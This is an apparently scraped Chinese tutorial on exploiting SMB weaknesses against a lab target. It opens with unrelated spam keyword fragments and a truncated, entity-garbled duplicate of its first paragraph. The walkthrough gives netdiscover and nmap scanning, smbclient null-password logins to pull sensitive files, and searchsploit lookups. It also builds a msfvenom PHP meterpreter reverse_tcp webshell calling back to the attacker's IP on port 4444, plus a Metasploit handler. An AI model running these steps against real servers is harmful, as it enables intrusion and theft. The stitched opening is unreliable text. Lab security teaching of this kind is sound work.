flash 网站源码,广告艺术设计学的是什么,wordpress多语言生成工具,企业网站的基本内容有哪些一、背景
今天分享SMB信息泄露#xff0c;SMB#xff08;Server Message Block#xff09;网络通信协议#xff0c;早些时候被用于Web链接和客户端与服务器之间的信息通信#xff0c;现在大部分Web页面使用HTTP协议#xff0c;在web领域应用较少。另一方面SMB协议还是被…一、背景
今天分享SMB信息泄露SMBServer Message Block网络通信协议早些时候被用于Web链接和客户端与服务器之间的信息通信现在大部分Web页面使用HTTP协议在web领域应用较少。另一方面SMB协议还是被广泛用于计算机之间共享文件、打印机、串口等信息通信比如在windows操作系统上面的“网上邻居”的实现就是靠SMB实现的。 SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议客户端应用程序可以在各种网络环境下读、写服务器上的文件以及对服务器程序提出服务请求。此外通过 SMB 协议应用程序可以访问远程服务器端的文件、以及打印机等资源。 SMB 协议基于TCP - NETBIOS下的一般端口使用 139,445
二、SMB泄露原理
SMB协议是一种客户端-服务器协议尽管SMB协议在网络文件共享中起到重要作用但它也有一些安全漏洞使得系统容易受到攻击。以下是一些常见的SMB协议安全漏洞 1.无法强制用户使用较强的密码SMB协议在早期版本中没有强制要求用户使用强密码这给攻击者破解密码提供了机会。比如使用弱密码暴力破解。 2.NTLM身份验证问题NTLMWindows NTLAN Manager是SMB协议中使用的一种身份验证协议它的早期版本在安全性方面存在一些漏洞。攻击者可以通过中间人攻击或暴力破解。 3.SMB协议版本问题一些较早版本的SMB存在安全漏洞用户可以在kali上通过searchsploit 找到对应版本的漏洞已经响应的利用脚本。 4.缓冲区溢出由于SMB协议没有对用户输入进行充分验证攻击者可以通过发送特制的请求来触发缓冲区溢出导致远程恶意代码执行。 既然SMB存在这些漏洞接下来我们看一下如何一步步进行SMB漏洞的利用
三、SMB信息泄露利用步骤
进行SMB漏洞利用主要还是要参考局域网靶机渗透操作指南接下来我们看一下如何进行SMB漏洞利用
3.1 寻找靶机
查看局域网中靶机的IP 使用工具为netdiscover工具 命令格式 netdiscover -r ip/mask
3.2 探测靶机开放的服务以及服务使用框架的版本
使用nmap工具具体命令格式nmap -sV 靶机ip
3.3 找到SMB协议并针对协议进行分析
a 针对SMB协议使用空口令若口令尝试登陆并查看敏感文件 smbclinet -L IP //查看SMB文件目录 使用空口令尝试登陆 smbclient ‘\IP\share$’ //查看SMB文件使用空密码其中的share就是SMB列出的文件名称 get 敏感文件 //下载文件 b针对SMB协议远程溢出漏洞进行分析 searchsploit samba版本号 //搜索SMB远程溢出漏洞
3.4 基于3.3找出漏洞的情况下我们可以制作一些反弹Shell
主要利用metasploit这款工具制作反弹shell 例如我制作的是PHP框架下的一个tcp反弹的webshell使用的攻击载荷payloadphp/meterpreter/reverse_tcp msfvenom -p php/meterpreter/reverse_tcp lhost攻击机IP lport4444 -f raw 制作一个webshell并运行起来 然后攻击机启动metasploit然后启动监听 msfconsole//启动metasploit
msf use exploit/multi/handler
msf exploit(handler) set payload php/meterpreter/reverse_tcp
msf exploit(handler) set lhost 攻击机IP地址
msf exploit(handler) set lport 4444
msf exploit(handler) run只有有人触发了php框架下的反弹shell脚本攻击机就会获得服务器的登录权限。
四、总结
SMB的协议出现较早应用较广泛但是早期计算机协议注重应用的快速建立而对安全的要求并不太严格所以很多较老的设备使用了存在漏洞的SMB协议就会存在安全隐患。我们在SMB漏洞的利用中主要还是基于msf提供的一些payload这些payload其实都是别人做好了的所以用起来特别方便也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便所以我们在计算机安全防护上还需进行更多的考虑必要的安全设置应该保留不要为了一时方便关闭所有安全防护的护盾。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟如有写的不好的地方也请大家多多包涵。
